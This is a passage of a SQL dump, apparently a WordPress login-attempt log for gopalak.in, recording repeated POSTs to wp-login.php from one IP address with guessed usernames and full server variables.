"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"110\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746985580.0488231;s:12:\"REQUEST_TIME\";i:1746985580;}}','13.233.245.36',1,'2025-05-11 23:16:21','2025-05-12 23:29:05'),(95575,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"122\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"13.233.245.36\";s:14:\"HTTP_X_REAL_IP\";s:13:\"13.233.245.36\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:13:\"13.233.245.36\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"122\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746985580.049047;s:12:\"REQUEST_TIME\";i:1746985580;}}','13.233.245.36',1,'2025-05-11 23:16:21','2025-05-12 23:29:05'),(95576,3,'a:2:{s:8:\"username\";s:4:\"beta\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"107\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"13.233.245.36\";s:14:\"HTTP_X_REAL_IP\";s:13:\"13.233.245.36\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:13:\"13.233.245.36\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"107\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746985959.0775311;s:12:\"REQUEST_TIME\";i:1746985959;}}','13.233.245.36',1,'2025-05-11 23:22:40','2025-05-12 23:29:05'),(95577,4,'a:2:{s:8:\"username\";s:5:\"gamma\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"109\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"13.233.245.36\";s:14:\"HTTP_X_REAL_IP\";s:13:\"13.233.245.36\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:13:\"13.233.245.36\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"109\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746985959.080534;s:12:\"REQUEST_TIME\";i:1746985959;}}','13.233.245.36',1,'2025-05-11 23:22:40','2025-05-12 23:29:05'),(95578,5,'a:2:{s:8:\"username\";s:7:\"mercury\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"113\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"13.233.245.36\";s:14:\"HTTP_X_REAL_IP\";s:13:\"13.233.245.36\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:13:\"13.233.245.36\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"113\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746985959.081466;s:12:\"REQUEST_TIME\";i:1746985959;}}','13.233.245.36',1,'2025-05-11 23:22:40','2025-05-12 23:29:05'),(95579,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"121\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"13.233.245.36\";s:14:\"HTTP_X_REAL_IP\";s:13:\"13.233.245.36\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:13:\"13.233.245.36\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"121\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746985959.0633171;s:12:\"REQUEST_TIME\";i:1746985959;}}','13.233.245.36',1,'2025-05-11 23:22:40','2025-05-12 23:29:05'),(95580,2,'a:2:{s:8:\"username\";s:5:\"Alpha\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"109\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"13.233.245.36\";s:14:\"HTTP_X_REAL_IP\";s:13:\"13.233.245.36\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:13:\"13.233.245.36\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"109\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746985959.067168;s:12:\"REQUEST_TIME\";i:1746985959;}}','13.233.245.36',1,'2025-05-11 23:22:40','2025-05-12 23:29:05'),(95581,3,'a:2:{s:8:\"username\";s:4:\"beta\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"127\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"13.233.245.36\";s:14:\"HTTP_X_REAL_IP\";s:13:\"13.233.245.36\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:13:\"13.233.245.36\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"127\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746986343.6555851;s:12:\"REQUEST_TIME\";i:1746986343;}}','13.233.245.36',1,'2025-05-11 23:29:05','2025-05-12 23:29:05'),(95582,4,'a:2:{s:8:\"username\";s:5:\"gamma\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"128\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"13.233.245.36\";s:14:\"HTTP_X_REAL_IP\";s:13:\"13.233.245.36\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:13:\"13.233.245.36\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"128\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746986343.6677949;s:12:\"REQUEST_TIME\";i:1746986343;}}','13.233.245.36',1,'2025-05-11 23:29:05','2025-05-12 23:29:05'),(95583,5,'a:2:{s:8:\"username\";s:7:\"mercury\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"130\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"13.233.245.36\";s:14:\"HTTP_X_REAL_IP\";s:13:\"13.233.245.36\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:13:\"13.233.245.36\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"130\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746986343.668674;s:12:\"REQUEST_TIME\";i:1746986343;}}','13.233.245.36',1,'2025-05-11 23:29:05','2025-05-12 23:29:05'),(95584,2,'a:2:{s:8:\"username\";s:5:\"Alpha\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"128\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"13.233.245.36\";s:14:\"HTTP_X_REAL_IP\";s:13:\"13.233.245.36\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:13:\"13.233.245.36\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"128\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746986343.6245949;s:12:\"REQUEST_TIME\";i:1746986343;}}','13.233.245.36',1,'2025-05-11 23:29:05','2025-05-12 23:29:05'),(95585,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"134\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"13.233.245.36\";s:14:\"HTTP_X_REAL_IP\";s:13:\"13.233.245.36\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:13:\"13.233.245.36\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PRO